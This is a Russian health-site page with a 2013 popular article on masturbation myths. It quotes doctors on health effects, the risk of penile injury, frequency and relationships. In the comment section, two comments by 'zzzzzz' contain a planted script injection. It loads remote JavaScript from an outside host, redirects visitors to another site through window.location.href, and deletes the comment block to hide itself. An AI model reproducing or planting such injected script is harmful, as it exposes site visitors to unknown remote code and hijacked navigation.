Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Мастурбация. Вы ничего не...  >>  Мастурбация. Вы ничего не знали
 
Обратная связь
 

Мастурбация. Вы ничего не знали

Размер шрифта
12 ноября 2013 00:00
  • google_analytics: false
  • Нравится

Каждый мужчина считает, что он видный эксперт в вопросах мастурбации. Многолетний опыт «из первых рук» создает иллюзию того, что вы знаете об этом явлении все. Однако уж поверьте, это далеко не так. И у нас есть, чем удивить вас в этом пикантном вопросе.

Мастурбация. Вы ничего не знали

Мастурбация менее полезна, чем секс

«Оргазм оргазму – рознь», – рассказывает доктор Тобайес Кохлер, доцент медцинского факультета университета Южного Иллинойса в Спрингфилде (США).

Многочисленные исследования показывают, что половой акт полезен чуть ли не для всех аспектов мужского здоровья, а именно: для артериального давления, предстательной железы, сердечного ритма и так далее. По логике вещей, аналогичными эффектами должна обладать и мастурбация. Но это, увы, не так.

Почему же так происходит, ведь, казалось бы, в обоих случаях все успешно заканчивается эякуляцией. Никто точно не знает. Организм почему-то реагирует иначе на эти близкородственные занятия. Даже внешний вид спермы в исходе мастурбации или секса отличается.

Но так ли это важно? Положа руку на сердце, неужели вы делали ЭТО все эти годы ради здоровья простаты? Вряд ли.

Мастурбация не лишена рисков

Безусловно, риски крайне невелики. По сути, мастурбация – самый безопасный вариант секса. За всю историю человечества от своей правой руки никто еще не забеременел и не подхватил сифилис. И, тем не менее, не все так просто.

Частая или резкая мастурбация может вызывать раздражение кожи. Если уже слишком увлечься и буйно согнуть половой член, можно травмировать пещеристые тела (проще говоря, сломать пенис; это редкое, но весьма опасное состояние).

Доктор Кохлер видел мужчин с такой травмой после жесткой мастурбации. «Пенис в этом случае напоминает баклажан: он страшно отекает и приобретает пурпурный цвет», – рассказывает он. В этом случае нужно вмешательство хирурга.

«Приемлемое количество мастурбаций в день» – это миф

Мужчины могут переживать относительно того, что слишком часто мастурбируют. Но дело не в том, как часто вы это делаете. Куда важнее роль мастурбации в вашей жизни.

Если вы расслабляетесь ручным способом несколько раз в день, и при этом у вас полноценная счастливая жизнь, – что ж, замечательно! Если же частая мастурбация отвлекает вас от работы или вносит разлад в сексуальную жизнь с вашим половым партнером – возможно, стоит обратиться к сексопатологу.

В этом случае мастурбация ничем не отличается от любых других вредных привычек, будь то азартные игры или страсть к бесполезным покупкам в он-лайне.

Мастурбация не отражается на ваших отношениях

Один из самых жизнестойких мифов, касающихся мастурбации, заключается в том, что в здоровых отношениях ей нет места.

Простой факт: почти все парни мастурбируют. Они делают это, находясь в отличных отношениях с подругой, в плохих отношениях и даже вовсе без всяких отношений. Это просто рутинное занятие, не имеющее отношения к половому партнеру.

Мастурбация – это не просто вариант секса «сам с собой». Для многих мужчин это возможность снять стресс, встряхнуться перед работой или своеобразное снотворное перед сном.

Мастурбация – это благо для вашей сексуальной жизни

Это несомненно. Мастурбируя, мужчины познают свое тело и приобретают понимание того, что им нравится во время секса. Многие эксперты убеждены, что женщины были бы в большей степени удовлетворены своей сексуальной жизнью, если бы мастурбировали столь же часто, как и мужчины.

Возможны ли исключения? «Некоторые мужчины настолько привыкают к определенной степени давления своей руки и смазливым лицам из порно-фильмов, что у них могут возникнуть проблемы с реальными женщинами», – утверждает Иэн Кернер, сексопатолог.

Однако такие случаи весьма редки. «Большинству мужчин регулярная мастурбация идет только на пользу», – говорит Кернер. «Лично меня как специалиста больше беспокоит другая ситуация: когда мужчина вдруг перестает мастурбировать. Это может указывать на тревожное расстройство и ряд других проблем».

Так что мастурбируйте на здоровье, дорогие мужчины. И не забудьте посетить наш специальный проект «Секс с мужчиной» – настоящий кладезь информации о мужском здоровье.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:54

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:53

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Секс при простатите: особенности и последствия   Обрезание после 35 лет предотвратит рак простаты! Осталось только найти желающих...   Муж не может долго заниматься сексом? Всего одна вещь решит вашу проблему!   В лабораториях научились выращивать настоящие половые члены?  
09 июля 2013Майкл Дуглас заболел раком гортани из-за орального секса! Как дальше жить? 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Чем полезен секс?
Проблемы, с которыми справится секс. Часть 4
Проблемы, с которыми справится секс. Часть 2

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.